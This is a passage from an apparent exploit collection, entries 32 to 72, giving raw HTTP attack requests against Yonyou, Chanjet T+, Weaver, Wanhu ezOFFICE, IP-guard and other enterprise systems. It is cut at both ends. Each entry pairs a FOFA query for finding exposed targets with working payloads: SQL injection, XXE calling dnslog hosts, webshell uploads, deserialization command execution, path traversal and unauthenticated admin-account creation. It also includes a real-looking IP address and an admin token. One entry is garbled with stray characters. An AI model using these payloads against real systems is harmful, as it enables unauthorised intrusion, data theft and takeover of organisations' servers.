User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

" H! _6 c; N3 }3 R! b" x: b# e59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* o+ m8 ?  R. @% p) f5 Q
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd": A9 |! m5 }7 u. q, e# l
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1/ n1 H! ^4 e/ M4 I# s  E
Host: 192.168.86.128:9090# p6 m. m1 m& `+ R. V! |0 e) t3 }
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 f7 O; o9 t8 W1 E/ bConnection: close
( F0 ]  \: ^* v/ Y( uContent-Length: 1669$ v0 G. W4 y: u5 F/ o2 P! K. M0 S
Accept: */*
/ E# W4 j( B; S' W' _8 D# s6 XAccept-Language: en0 {: a1 u0 p9 ?7 r% Y& ]  s. z
Content-Type: application/x-www-form-urlencoded
7 O9 F, {- Y! r& VAccept-Encoding: gzip0 G0 C) W) [7 u4 O

' |8 F7 {2 [4 ~9 p" R  I! TPAYLOAD
# Y6 x! @9 ?' j/ h8 }* E' C+ k0 x0 r& m) r0 r, c* u

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the path it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
